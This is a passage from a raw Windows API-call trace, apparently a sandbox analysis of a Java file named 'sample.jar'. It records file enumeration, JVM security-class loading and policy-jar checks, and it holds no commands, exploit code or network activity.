ftLastWriteTime.dwLowDateTime=0x4d4cf6b0, ftLastWriteTime.dwHighDateTime=0x1d7da74, nFileSizeHigh=0x0, nFileSizeLow=0x6d36, dwReserved0=0x700041, dwReserved1=0x440070, cFileName="pgK4S6CjwD66C44-qQ.bmp", cAlternateFileName="PGK4S6~1.BMP")) returned 1 [0112.265] wcslen (_String="pgK4S6CjwD66C44-qQ.bmp") returned 0x16 [0112.266] FindNextFileW (in: hFindFile=0x425d20, lpFindFileData=0x12307740 | out: lpFindFileData=0x12307740*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe923010, ftCreationTime.dwHighDateTime=0x1d7e2f4, ftLastAccessTime.dwLowDateTime=0x2f6e4b0, ftLastAccessTime.dwHighDateTime=0x1d7e3f0, ftLastWriteTime.dwLowDateTime=0x2f6e4b0, ftLastWriteTime.dwHighDateTime=0x1d7e3f0, nFileSizeHigh=0x0, nFileSizeLow=0x56b8, dwReserved0=0x700041, dwReserved1=0x440070, cFileName="ptld.mp4", cAlternateFileName="")) returned 1 [0112.266] wcslen (_String="ptld.mp4") returned 0x8 [0112.266] FindNextFileW (in: hFindFile=0x425d20, lpFindFileData=0x12307740 | out: lpFindFileData=0x12307740*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2bf149d0, ftCreationTime.dwHighDateTime=0x1d7d75e, ftLastAccessTime.dwLowDateTime=0xb5e44a80, ftLastAccessTime.dwHighDateTime=0x1d7df64, ftLastWriteTime.dwLowDateTime=0xb5e44a80, ftLastWriteTime.dwHighDateTime=0x1d7df64, nFileSizeHigh=0x0, nFileSizeLow=0x1174e, dwReserved0=0x700041, dwReserved1=0x440070, cFileName="QTr6pAB0.mp3", cAlternateFileName="")) returned 1 [0112.266] wcslen (_String="QTr6pAB0.mp3") returned 0xc [0112.266] FindNextFileW (in: hFindFile=0x425d20, lpFindFileData=0x12307740 | out: lpFindFileData=0x12307740*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31f99150, ftCreationTime.dwHighDateTime=0x1d7e507, ftLastAccessTime.dwLowDateTime=0x73a74500, ftLastAccessTime.dwHighDateTime=0x1d7e6da, ftLastWriteTime.dwLowDateTime=0x73a74500, ftLastWriteTime.dwHighDateTime=0x1d7e6da, nFileSizeHigh=0x0, nFileSizeLow=0xe2dc, dwReserved0=0x700041, dwReserved1=0x440070, cFileName="qu6w1wGgLKyK6bNZ.avi", cAlternateFileName="QU6W1W~1.AVI")) returned 1 [0112.267] wcslen (_String="qu6w1wGgLKyK6bNZ.avi") returned 0x14 [0112.267] FindNextFileW (in: hFindFile=0x425d20, lpFindFileData=0x12307740 | out: lpFindFileData=0x12307740*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75457470, ftCreationTime.dwHighDateTime=0x1d7dc41, ftLastAccessTime.dwLowDateTime=0x6a20b490, ftLastAccessTime.dwHighDateTime=0x1d7e076, ftLastWriteTime.dwLowDateTime=0x6a20b490, ftLastWriteTime.dwHighDateTime=0x1d7e076, nFileSizeHigh=0x0, nFileSizeLow=0x6242, dwReserved0=0x700041, dwReserved1=0x440070, cFileName="rIKTqKuFQIT9_.avi", cAlternateFileName="RIKTQK~1.AVI")) returned 1 [0112.267] wcslen (_String="rIKTqKuFQIT9_.avi") returned 0x11 [0112.267] FindNextFileW (in: hFindFile=0x425d20, lpFindFileData=0x12307740 | out: lpFindFileData=0x12307740*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc8cd4e0, ftCreationTime.dwHighDateTime=0x1d7d86d, ftLastAccessTime.dwLowDateTime=0x7b9c6e00, ftLastAccessTime.dwHighDateTime=0x1d7db8d, ftLastWriteTime.dwLowDateTime=0x7b9c6e00, ftLastWriteTime.dwHighDateTime=0x1d7db8d, nFileSizeHigh=0x0, nFileSizeLow=0x1804d, dwReserved0=0x700041, dwReserved1=0x440070, cFileName="rtZPyaNC0g.jpg", cAlternateFileName="RTZPYA~1.JPG")) returned 1 [0112.267] wcslen (_String="rtZPyaNC0g.jpg") returned 0xe [0112.268] FindNextFileW (in: hFindFile=0x425d20, lpFindFileData=0x12307740 | out: lpFindFileData=0x12307740*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfad00460, ftCreationTime.dwHighDateTime=0x1d7e1f6, ftLastAccessTime.dwLowDateTime=0x89e19c00, ftLastAccessTime.dwHighDateTime=0x1d7e372, ftLastWriteTime.dwLowDateTime=0x89e19c00, ftLastWriteTime.dwHighDateTime=0x1d7e372, nFileSizeHigh=0x0, nFileSizeLow=0xe0ea, dwReserved0=0x700041, dwReserved1=0x440070, cFileName="tmB8EKM9vNwKh3vgkNR.mkv", cAlternateFileName="TMB8EK~1.MKV")) returned 1 [0112.268] wcslen (_String="tmB8EKM9vNwKh3vgkNR.mkv") returned 0x17 [0112.268] FindNextFileW (in: hFindFile=0x425d20, lpFindFileData=0x12307740 | out: lpFindFileData=0x12307740*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x146a70f0, ftCreationTime.dwHighDateTime=0x1d7de7c, ftLastAccessTime.dwLowDateTime=0x43634c10, ftLastAccessTime.dwHighDateTime=0x1d7e642, ftLastWriteTime.dwLowDateTime=0x43634c10, ftLastWriteTime.dwHighDateTime=0x1d7e642, nFileSizeHigh=0x0, nFileSizeLow=0x134e, dwReserved0=0x700041, dwReserved1=0x440070, cFileName="TWPJa9z1j.bmp", cAlternateFileName="TWPJA9~1.BMP")) returned 1 [0112.268] wcslen (_String="TWPJa9z1j.bmp") returned 0xd [0112.268] FindNextFileW (in: hFindFile=0x425d20, lpFindFileData=0x12307740 | out: lpFindFileData=0x12307740*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf3bb850, ftCreationTime.dwHighDateTime=0x1d7e1f6, ftLastAccessTime.dwLowDateTime=0x4fffa50, ftLastAccessTime.dwHighDateTime=0x1d7e691, ftLastWriteTime.dwLowDateTime=0x4fffa50, ftLastWriteTime.dwHighDateTime=0x1d7e691, nFileSizeHigh=0x0, nFileSizeLow=0x35a9, dwReserved0=0x700041, dwReserved1=0x440070, cFileName="V2jKbS4sZZQk5b.mkv", cAlternateFileName="V2JKBS~1.MKV")) returned 1 [0112.268] wcslen (_String="V2jKbS4sZZQk5b.mkv") returned 0x12 [0112.269] FindNextFileW (in: hFindFile=0x425d20, lpFindFileData=0x12307740 | out: lpFindFileData=0x12307740*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50d2f120, ftCreationTime.dwHighDateTime=0x1d7da1c, ftLastAccessTime.dwLowDateTime=0xa1fa980, ftLastAccessTime.dwHighDateTime=0x1d7e6e7, ftLastWriteTime.dwLowDateTime=0xa1fa980, ftLastWriteTime.dwHighDateTime=0x1d7e6e7, nFileSizeHigh=0x0, nFileSizeLow=0xe826, dwReserved0=0x700041, dwReserved1=0x440070, cFileName="wKBSxbxHFH5U1.m4a", cAlternateFileName="WKBSXB~1.M4A")) returned 1 [0112.269] wcslen (_String="wKBSxbxHFH5U1.m4a") returned 0x11 [0112.269] FindNextFileW (in: hFindFile=0x425d20, lpFindFileData=0x12307740 | out: lpFindFileData=0x12307740*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c6ce100, ftCreationTime.dwHighDateTime=0x1d7e020, ftLastAccessTime.dwLowDateTime=0x1a8a3ae0, ftLastAccessTime.dwHighDateTime=0x1d7e21b, ftLastWriteTime.dwLowDateTime=0x1a8a3ae0, ftLastWriteTime.dwHighDateTime=0x1d7e21b, nFileSizeHigh=0x0, nFileSizeLow=0x146ff, dwReserved0=0x700041, dwReserved1=0x440070, cFileName="Wp2CBC.odt", cAlternateFileName="")) returned 1 [0112.269] wcslen (_String="Wp2CBC.odt") returned 0xa [0112.270] FindNextFileW (in: hFindFile=0x425d20, lpFindFileData=0x12307740 | out: lpFindFileData=0x12307740*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1219da0, ftCreationTime.dwHighDateTime=0x1d7de24, ftLastAccessTime.dwLowDateTime=0x19b9be50, ftLastAccessTime.dwHighDateTime=0x1d7e014, ftLastWriteTime.dwLowDateTime=0x19b9be50, ftLastWriteTime.dwHighDateTime=0x1d7e014, nFileSizeHigh=0x0, nFileSizeLow=0xa8d9, dwReserved0=0x700041, dwReserved1=0x440070, cFileName="Y3x2frGQ6WdFawYn0Q.bmp", cAlternateFileName="Y3X2FR~1.BMP")) returned 1 [0112.270] wcslen (_String="Y3x2frGQ6WdFawYn0Q.bmp") returned 0x16 [0112.270] FindNextFileW (in: hFindFile=0x425d20, lpFindFileData=0x12307740 | out: lpFindFileData=0x12307740*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5a41c30, ftCreationTime.dwHighDateTime=0x1d7d7e1, ftLastAccessTime.dwLowDateTime=0xedabc740, ftLastAccessTime.dwHighDateTime=0x1d7e0d6, ftLastWriteTime.dwLowDateTime=0xedabc740, ftLastWriteTime.dwHighDateTime=0x1d7e0d6, nFileSizeHigh=0x0, nFileSizeLow=0x15b0f, dwReserved0=0x700041, dwReserved1=0x440070, cFileName="zMsKNIB.mp3", cAlternateFileName="")) returned 1 [0112.270] wcslen (_String="zMsKNIB.mp3") returned 0xb [0112.270] FindNextFileW (in: hFindFile=0x425d20, lpFindFileData=0x12307740 | out: lpFindFileData=0x12307740*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8213a590, ftCreationTime.dwHighDateTime=0x1d7e183, ftLastAccessTime.dwLowDateTime=0x2323cf20, ftLastAccessTime.dwHighDateTime=0x1d7e2e0, ftLastWriteTime.dwLowDateTime=0x2323cf20, ftLastWriteTime.dwHighDateTime=0x1d7e2e0, nFileSizeHigh=0x0, nFileSizeLow=0xd2f4, dwReserved0=0x700041, dwReserved1=0x440070, cFileName="_ Touk_8xMDcNi3oowA2.mp4", cAlternateFileName="_TOUK_~1.MP4")) returned 1 [0112.270] wcslen (_String="_ Touk_8xMDcNi3oowA2.mp4") returned 0x18 [0112.271] FindNextFileW (in: hFindFile=0x425d20, lpFindFileData=0x12307740 | out: lpFindFileData=0x12307740*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0x535a33be, ftCreationTime.dwHighDateTime=0x1d7e78c, ftLastAccessTime.dwLowDateTime=0x535a33be, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x535a33be, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x700041, dwReserved1=0x440070, cFileName="~DF2D984A313CCC0967.TMP", cAlternateFileName="~DF2D9~1.TMP")) returned 1 [0112.271] wcslen (_String="~DF2D984A313CCC0967.TMP") returned 0x17 [0112.271] FindNextFileW (in: hFindFile=0x425d20, lpFindFileData=0x12307740 | out: lpFindFileData=0x12307740*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0x554a1b81, ftCreationTime.dwHighDateTime=0x1d7e78c, ftLastAccessTime.dwLowDateTime=0x554a1b81, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x554a1b81, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x700041, dwReserved1=0x440070, cFileName="~DF5FDF316E3AA0E72F.TMP", cAlternateFileName="~DF5FD~1.TMP")) returned 1 [0112.271] wcslen (_String="~DF5FDF316E3AA0E72F.TMP") returned 0x17 [0112.271] FindNextFileW (in: hFindFile=0x425d20, lpFindFileData=0x12307740 | out: lpFindFileData=0x12307740*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e3a3fca, ftCreationTime.dwHighDateTime=0x1d80c8a, ftLastAccessTime.dwLowDateTime=0x1e3a3fca, ftLastAccessTime.dwHighDateTime=0x1d80c8a, ftLastWriteTime.dwLowDateTime=0x1e543220, ftLastWriteTime.dwHighDateTime=0x1d80c8a, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x700041, dwReserved1=0x440070, cFileName="~DF79BB57CAD0F46C99.TMP", cAlternateFileName="~DF79B~1.TMP")) returned 1 [0112.271] wcslen (_String="~DF79BB57CAD0F46C99.TMP") returned 0x17 [0112.272] FindNextFileW (in: hFindFile=0x425d20, lpFindFileData=0x12307740 | out: lpFindFileData=0x12307740*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0x1e547e58, ftCreationTime.dwHighDateTime=0x1d80c8a, ftLastAccessTime.dwLowDateTime=0x1e547e58, ftLastAccessTime.dwHighDateTime=0x1d80c8a, ftLastWriteTime.dwLowDateTime=0x1e5491b3, ftLastWriteTime.dwHighDateTime=0x1d80c8a, nFileSizeHigh=0x0, nFileSizeLow=0x200, dwReserved0=0x700041, dwReserved1=0x440070, cFileName="~DF9D3AECEB740E4F1A.TMP", cAlternateFileName="~DF9D3~1.TMP")) returned 1 [0112.272] wcslen (_String="~DF9D3AECEB740E4F1A.TMP") returned 0x17 [0112.272] FindNextFileW (in: hFindFile=0x425d20, lpFindFileData=0x12307740 | out: lpFindFileData=0x12307740*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0x5ef95884, ftCreationTime.dwHighDateTime=0x1d7e78c, ftLastAccessTime.dwLowDateTime=0x5ef95884, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x5ef95884, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x700041, dwReserved1=0x440070, cFileName="~DFA0E358692D41C4E6.TMP", cAlternateFileName="~DFA0E~1.TMP")) returned 1 [0112.272] wcslen (_String="~DFA0E358692D41C4E6.TMP") returned 0x17 [0112.273] FindNextFileW (in: hFindFile=0x425d20, lpFindFileData=0x12307740 | out: lpFindFileData=0x12307740*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0x5ef95884, ftCreationTime.dwHighDateTime=0x1d7e78c, ftLastAccessTime.dwLowDateTime=0x5ef95884, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x5ef95884, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x700041, dwReserved1=0x440070, cFileName="~DFA0E358692D41C4E6.TMP", cAlternateFileName="~DFA0E~1.TMP")) returned 0 [0112.273] GetLastError () returned 0x12 [0112.275] FindClose (in: hFindFile=0x425d20 | out: hFindFile=0x425d20) returned 1 [0112.369] strlen (_Str="java/security/interfaces/RSAPublicKey") returned 0x25 [0112.370] strlen (_Str="java/security/interfaces/RSAPrivateKey") returned 0x26 [0112.370] strlen (_Str="sun/security/rsa/RSASignature$MD5withRSA") returned 0x28 [0112.371] strlen (_Str="sun/security/rsa/RSASignature$MD5withRSA.class") returned 0x2e [0112.371] malloc (_Size=0x48) returned 0x12ef2980 [0112.371] malloc (_Size=0xa0) returned 0x12324540 [0112.371] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33df5b4, lpNewFilePointer=0x208b9a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b9a0*=54392244) returned 1 [0112.371] ReadFile (in: hFile=0x134, lpBuffer=0x12324540, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b970, lpOverlapped=0x0 | out: lpBuffer=0x12324540*, lpNumberOfBytesRead=0x208b970*=0xa0, lpOverlapped=0x0) returned 1 [0112.371] malloc (_Size=0x2f) returned 0x12ef3b50 [0112.375] strlen (_Str="sun/security/provider/MD5") returned 0x19 [0112.376] strlen (_Str="sun/security/provider/MD5.class") returned 0x1f [0112.376] malloc (_Size=0x48) returned 0x12ef34c0 [0112.376] malloc (_Size=0xa0) returned 0x12324540 [0112.376] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33dc603, lpNewFilePointer=0x208aeb0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208aeb0*=54380035) returned 1 [0112.376] ReadFile (in: hFile=0x134, lpBuffer=0x12324540, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ae80, lpOverlapped=0x0 | out: lpBuffer=0x12324540*, lpNumberOfBytesRead=0x208ae80*=0xa0, lpOverlapped=0x0) returned 1 [0112.376] malloc (_Size=0x20) returned 0x12ef1200 [0112.390] strlen (_Str="java/security/SignatureException.class") returned 0x26 [0112.390] malloc (_Size=0x48) returned 0x12ef2980 [0112.390] malloc (_Size=0xa0) returned 0x12324540 [0112.390] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33f14b7, lpNewFilePointer=0x208b720, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b720*=54465719) returned 1 [0112.390] ReadFile (in: hFile=0x134, lpBuffer=0x12324540, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b6f0, lpOverlapped=0x0 | out: lpBuffer=0x12324540*, lpNumberOfBytesRead=0x208b6f0*=0xa0, lpOverlapped=0x0) returned 1 [0112.390] malloc (_Size=0x27) returned 0x12ef11a0 [0112.397] strlen (_Str="java/security/interfaces/DSAPublicKey") returned 0x25 [0112.398] strlen (_Str="java/security/interfaces/DSAPrivateKey") returned 0x26 [0112.398] strlen (_Str="java/security/interfaces/DSAPrivateKey.class") returned 0x2c [0112.398] malloc (_Size=0x48) returned 0x12ef29d0 [0112.398] malloc (_Size=0xa0) returned 0x12324540 [0112.398] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33ef4ae, lpNewFilePointer=0x208b950, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b950*=54457518) returned 1 [0112.398] ReadFile (in: hFile=0x134, lpBuffer=0x12324540, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b920, lpOverlapped=0x0 | out: lpBuffer=0x12324540*, lpNumberOfBytesRead=0x208b920*=0xa0, lpOverlapped=0x0) returned 1 [0112.398] malloc (_Size=0x2d) returned 0x12ef3b50 [0112.401] strlen (_Str="sun/security/provider/DSA$SHA1withDSA") returned 0x25 [0112.402] strlen (_Str="sun/security/provider/DSA$SHA1withDSA.class") returned 0x2b [0112.402] malloc (_Size=0x48) returned 0x12ef34c0 [0112.402] malloc (_Size=0xa0) returned 0x12324540 [0112.402] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33ef3b6, lpNewFilePointer=0x208b9a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b9a0*=54457270) returned 1 [0112.402] ReadFile (in: hFile=0x134, lpBuffer=0x12324540, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b970, lpOverlapped=0x0 | out: lpBuffer=0x12324540*, lpNumberOfBytesRead=0x208b970*=0xa0, lpOverlapped=0x0) returned 1 [0112.402] malloc (_Size=0x2c) returned 0x12ef4490 [0112.409] strlen (_Str="java/security/interfaces/DSAParams.class") returned 0x28 [0112.409] malloc (_Size=0x48) returned 0x12ef34c0 [0112.410] malloc (_Size=0xa0) returned 0x123245f0 [0112.410] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33f060e, lpNewFilePointer=0x208b460, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b460*=54461966) returned 1 [0112.410] ReadFile (in: hFile=0x134, lpBuffer=0x123245f0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b430, lpOverlapped=0x0 | out: lpBuffer=0x123245f0*, lpNumberOfBytesRead=0x208b430*=0xa0, lpOverlapped=0x0) returned 1 [0112.410] malloc (_Size=0x29) returned 0x12ef3b50 [0112.412] strlen (_Str="java/security/spec/DSAParameterSpec") returned 0x23 [0112.453] strlen (_Str="java/math/SignedMutableBigInteger.class") returned 0x27 [0112.453] malloc (_Size=0x48) returned 0x12ef34c0 [0112.453] malloc (_Size=0xa0) returned 0x12324540 [0112.453] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33ef211, lpNewFilePointer=0x208b320, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b320*=54456849) returned 1 [0112.453] ReadFile (in: hFile=0x134, lpBuffer=0x12324540, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b2f0, lpOverlapped=0x0 | out: lpBuffer=0x12324540*, lpNumberOfBytesRead=0x208b2f0*=0xa0, lpOverlapped=0x0) returned 1 [0112.453] malloc (_Size=0x28) returned 0x12ef0960 [0112.505] strlen (_Str="sun/reflect/MethodAccessorGenerator.class") returned 0x29 [0112.505] malloc (_Size=0x48) returned 0x12ef29d0 [0112.505] malloc (_Size=0xa0) returned 0x123245f0 [0112.505] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33ff73b, lpNewFilePointer=0x208a920, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208a920*=54523707) returned 1 [0112.505] ReadFile (in: hFile=0x134, lpBuffer=0x123245f0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208a8f0, lpOverlapped=0x0 | out: lpBuffer=0x123245f0*, lpNumberOfBytesRead=0x208a8f0*=0xa0, lpOverlapped=0x0) returned 1 [0112.505] malloc (_Size=0x2a) returned 0x12ef3b50 [0112.514] strlen (_Str="sun/reflect/ByteVectorFactory.class") returned 0x23 [0112.514] malloc (_Size=0x48) returned 0x12ef34c0 [0112.515] malloc (_Size=0xa0) returned 0x12324b70 [0112.515] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33ff647, lpNewFilePointer=0x208a520, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208a520*=54523463) returned 1 [0112.515] ReadFile (in: hFile=0x134, lpBuffer=0x12324b70, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208a4f0, lpOverlapped=0x0 | out: lpBuffer=0x12324b70*, lpNumberOfBytesRead=0x208a4f0*=0xa0, lpOverlapped=0x0) returned 1 [0112.515] malloc (_Size=0x24) returned 0x12ef11a0 [0112.521] strlen (_Str="sun/reflect/UTF8.class") returned 0x16 [0112.521] malloc (_Size=0x48) returned 0x12ef2ca0 [0112.521] malloc (_Size=0xa0) returned 0x123245f0 [0112.521] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33ff519, lpNewFilePointer=0x208a4b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208a4b0*=54523161) returned 1 [0112.521] ReadFile (in: hFile=0x134, lpBuffer=0x123245f0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208a480, lpOverlapped=0x0 | out: lpBuffer=0x123245f0*, lpNumberOfBytesRead=0x208a480*=0xa0, lpOverlapped=0x0) returned 1 [0112.521] malloc (_Size=0x17) returned 0x12edc8f0 [0112.547] strlen (_Str="sun/reflect/Label.class") returned 0x17 [0112.547] malloc (_Size=0x48) returned 0x12ef29d0 [0112.547] malloc (_Size=0xa0) returned 0x12324cd0 [0112.547] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33ff4d4, lpNewFilePointer=0x208a720, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208a720*=54523092) returned 1 [0112.547] ReadFile (in: hFile=0x134, lpBuffer=0x12324cd0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208a6f0, lpOverlapped=0x0 | out: lpBuffer=0x12324cd0*, lpNumberOfBytesRead=0x208a6f0*=0xa0, lpOverlapped=0x0) returned 1 [0112.547] malloc (_Size=0x18) returned 0x12edc730 [0112.553] strlen (_Str="sun/reflect/ClassDefiner.class") returned 0x1e [0112.553] malloc (_Size=0x48) returned 0x12ef34c0 [0112.553] malloc (_Size=0xa0) returned 0x123245f0 [0112.553] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33ff3e0, lpNewFilePointer=0x20898a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x20898a0*=54522848) returned 1 [0112.553] ReadFile (in: hFile=0x134, lpBuffer=0x123245f0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x2089870, lpOverlapped=0x0 | out: lpBuffer=0x123245f0*, lpNumberOfBytesRead=0x2089870*=0xa0, lpOverlapped=0x0) returned 1 [0112.553] malloc (_Size=0x1f) returned 0x12ef11a0 [0112.563] strlen (_Str="sun/reflect/BootstrapConstructorAccessorImpl.class") returned 0x32 [0112.563] malloc (_Size=0x48) returned 0x12ef2b10 [0112.563] malloc (_Size=0xa0) returned 0x123245f0 [0112.563] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33ff332, lpNewFilePointer=0x20899c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x20899c0*=54522674) returned 1 [0112.563] ReadFile (in: hFile=0x134, lpBuffer=0x123245f0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x2089990, lpOverlapped=0x0 | out: lpBuffer=0x123245f0*, lpNumberOfBytesRead=0x2089990*=0xa0, lpOverlapped=0x0) returned 1 [0112.563] malloc (_Size=0x33) returned 0x12ef4250 [0112.566] strlen (_Str="java/security/spec/DSAParameterSpec") returned 0x23 [0112.569] strlen (_Str="java/security/spec/DSAParameterSpec") returned 0x23 [0112.575] malloc (_Size=0x48) returned 0x12ef34c0 [0112.575] malloc (_Size=0xc) returned 0x12edc170 [0112.576] free (_Block=0x12ef1080) [0112.577] free (_Block=0x12ef31a0) [0112.577] free (_Block=0x12ef5680) [0112.578] free (_Block=0x12eea380) [0112.578] free (_Block=0x12ee9a40) [0112.578] free (_Block=0x12edc170) [0112.579] free (_Block=0x12ef34c0) [0112.579] free (_Block=0x12ee9860) [0112.579] free (_Block=0x12ec3af0) [0112.579] free (_Block=0x12edc290) [0112.579] free (_Block=0x12edc130) [0112.579] free (_Block=0x12edc510) [0112.579] free (_Block=0x12edc610) [0112.579] free (_Block=0x12edc570) [0112.579] free (_Block=0x12ef0c30) [0112.579] free (_Block=0x1221ba40) [0112.579] CloseHandle (hObject=0x2d4) returned 1 [0112.580] free (_Block=0x123243e0) [0112.580] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\policy\\unlimited\\local_policy.jar") returned 0x51 [0112.580] malloc (_Size=0xae) returned 0x1221ba40 [0112.580] wcscpy (in: _Dest=0x1221ba40, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\policy\\unlimited\\local_policy.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\policy\\unlimited\\local_policy.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\policy\\unlimited\\local_policy.jar" [0112.580] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\policy\\unlimited\\local_policy.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\security\\policy\\unlimited\\local_policy.jar"), dwDesiredAccess=0x0, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0x2d4 [0112.580] GetFileTime (in: hFile=0x2d4, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x208dcf8 | out: lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x208dcf8*(dwLowDateTime=0xeb489f40, dwHighDateTime=0x1d709ec)) returned 1 [0112.580] CloseHandle (hObject=0x2d4) returned 1 [0112.581] free (_Block=0x1221ba40) [0112.581] malloc (_Size=0x52) returned 0x12ee9380 [0112.581] _errno () returned 0x20f6be0 [0112.581] strlen (_Str="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\policy\\unlimited\\local_policy.jar") returned 0x51 [0112.581] strcpy (in: _Dest=0x208d8b0, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\policy\\unlimited\\local_policy.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\policy\\unlimited\\local_policy.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\policy\\unlimited\\local_policy.jar" [0112.581] strcmp (_Str1="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\policy\\unlimited\\local_policy.jar", _Str2="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunjce_provider.jar") returned 1 [0112.581] strcmp (_Str1="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\policy\\unlimited\\local_policy.jar", _Str2="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunec.jar") returned 1 [0112.581] strcmp (_Str1="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\policy\\unlimited\\local_policy.jar", _Str2="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jce.jar") returned 1 [0112.581] strcmp (_Str1="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\policy\\unlimited\\local_policy.jar", _Str2="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jsse.jar") returned 1 [0112.581] strcmp (_Str1="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\policy\\unlimited\\local_policy.jar", _Str2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar") returned -1 [0112.581] strcmp (_Str1="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\policy\\unlimited\\local_policy.jar", _Str2="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\rt.jar") returned 1 [0112.582] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\policy\\unlimited\\local_policy.jar") returned 0x51 [0112.582] malloc (_Size=0xae) returned 0x1221ba40 [0112.582] wcscpy (in: _Dest=0x1221ba40, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\policy\\unlimited\\local_policy.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\policy\\unlimited\\local_policy.jar") returned="C:\\Program 